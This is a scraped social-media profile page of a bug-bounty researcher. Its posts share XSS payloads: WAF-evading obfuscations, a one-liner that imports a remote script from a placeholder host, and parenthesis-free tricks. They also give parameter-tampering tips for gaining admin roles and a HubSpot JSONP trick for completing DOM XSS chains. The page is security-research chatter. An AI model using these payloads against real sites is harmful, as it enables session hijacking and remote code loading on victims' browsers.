Olivia
Online
Gaurav Kumar(GDATTACKER)
@gdattacker
Recon 🔍 | Assets 🌐 | Cybersecurity 🛡️ | World + Web explorer 🌍 | Tasty food keeps me scanning | @HackenProof Security Researcher
New Delhi, India
Joined May 2014
3.6K Following
882 Followers
4.7K Posts
@kornbuilds @airsignbreeze try connecting with the grievance officer first of the meta if they can help
@ni5arga @hetmehtaa @maninekkalapudi although you have been reporting to those but they don't have public policy to test bro so it's shady area testing without permission so @hetmehtaa is right
@Behi_Sec secret discoverer in burp works well
XSS PoC Styles
- Noob
alert(1)
- Bug Hunter
alert(document.domain)
- WAF Ninja
d=document,b='`',d['loca'%2B'tion']='javascrip'%2B't%26colon;aler'%2B't'%2Bb%2Bd.domain%2Bb
- Red Teamer
import('//domain.tld/xss2rce.js')
- KNOXSS
![KN0X55's tweet photo. XSS PoC Styles
- Noob
alert(1)
- Bug Hunter
alert(document.domain)
- WAF Ninja
d=document,b='`',d['loca'%2B'tion']='javascrip'%2B't%26colon;aler'%2B't'%2Bb%2Bd.domain%2Bb
- Red Teamer
import('//domain.tld/xss2rce.js')
- KNOXSS https://t.co/ScURetRYhB](https://pbs.twimg.com/media/HJU-K8vXAAsvnwm.jpg)
Who to follow
Omkar Mali🇮🇳
@OMK4RM4LI
• Yogosha Strike Force • Red Team at @pentabug• CEH• CPENT• LPT• CTF Player ⛳• Gamer🎮• Security Researcher
7h3h4ckv157 
@7h3h4ckv157
Hacker | Hall of Fame: Google, Apple, X, NASA | BlackHat MEA x1 | CVE ×4 | HackTheBox SME (Guru) | BC: P1 warrior | Featured in NASA’s IT Talk | OSCP | OSCP+
Critical Thinking - Bug Bounty Podcast
@ctbbpodcast
A 'by Hackers for Hackers' podcast focused on technical bug bounty content. Exploits, techniques, stories, bounties. Hosts: @rhynorater, @rez0__, @gr3pme
The "JavaScript:" XSS payload offers ample room for code obfuscation, as it can be encoded multiple times.
JavaScript:alert(1)
👇🏾
JavaScript:%61lert(1)
👇🏾
JavaScript:&#37&#54&#49lert(1)
👇🏾
JavaScript:%26%2337%26%2354%26%2349lert(1)
Lab https://t.co/9SUXZmy7EM
Quick bug bounty TIPS!
➡️ verified=false → true, “true”, "True", "TRUE", 1, "1", “yes”
➡️ /v3/users/1234 → v1, v0, internal, beta, legacy
➡️ quantity=100 → -1, 0, 9999999999, 1.82376931348623157e+308
➡️ role=”user” → “admin”, “”, null, “system”
➡️ /admin → /Admin, /ADMIN, /aDmIn
Try them now! ✅
Do you have something to add? 👇
Crash Course on JavaScript for XSS Hunters
Worth watching, liking and sharing!😎
https://t.co/wbSSrLLYvm
Some Neat XSS Tricks
</<K><Svg Onload=alert(1)>
</<Kno XSS="><Svg Onload=alert(1)>
<!<K><Svg Onload=alert(1)>
<!<Kno XSS="><Svg Onload=alert(1)>
Test them here:
https://t.co/oujWZWxxEk
Dharmendra Pradhan must resign!
A Claude Code skill bundle for bug hunting and external red-team work - 51 skills, 15 slash commands, 574+ disclosed-report patterns curated across 24 vulnerability classes, plus enterprise identity + infrastructure attack matrices. https://t.co/MpxsmCqaM3
XSS Without Parentheses
location=tagName
<JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName>
PoC https://t.co/uRcdd0RTWU
Ref https://t.co/fDkMWhEd4w
XSS shot for whitelists, might get executed in DOM if attribute is evaluated.
1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt;>
@HelleLyngSvends @Erroristotle the bjp owned a huge army of trollers and content management groups who do all possible tweeks and tricks but keep fighting. Truth can't escape for long time
If you are a cockroach write -
Dharmendra Pradhan must resign!
Details of tickets has been shared via dm as requested
@digitalocean what's going on account stuck at verification not getting reply on support ticket but the amount is being used from account help me out
During recent testing on a HubSpot-powered target, I needed a JSONP primitive to complete a DOM XSS chain.
One interesting behavior: HubSpot CMS exposes a built-in endpoint in this format:
`/_hcms/forms/embed/v3/form/{portalId}/{formId}?callback=alert`
Example :
`REDACTED. com/_hcms/forms/embed/v3/form/22544793/f411e5de-1b8b-4b19-8e6d-fe003d08cc8b?callback=alert`
It's a JSONP endpoint that wraps the response in whatever function name you pass. Just load it as <script src=...> and your callback fires.
The callback param has char restrictions so not every payload goes through, but alert() or prompt() works fine for proof. If you're hunting on any HubSpot site and just need that last JSONP piece for the chain, this is it.
#bugbounty
The most complete list of LLM vulnerability research for cybersecurity I've found:
https://t.co/3L4zH8f31p
It covers threat intelligence, NIDS rule labelling, vulnerability detection, code repair, and jailbreak defenses etc.
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.8M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.5M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers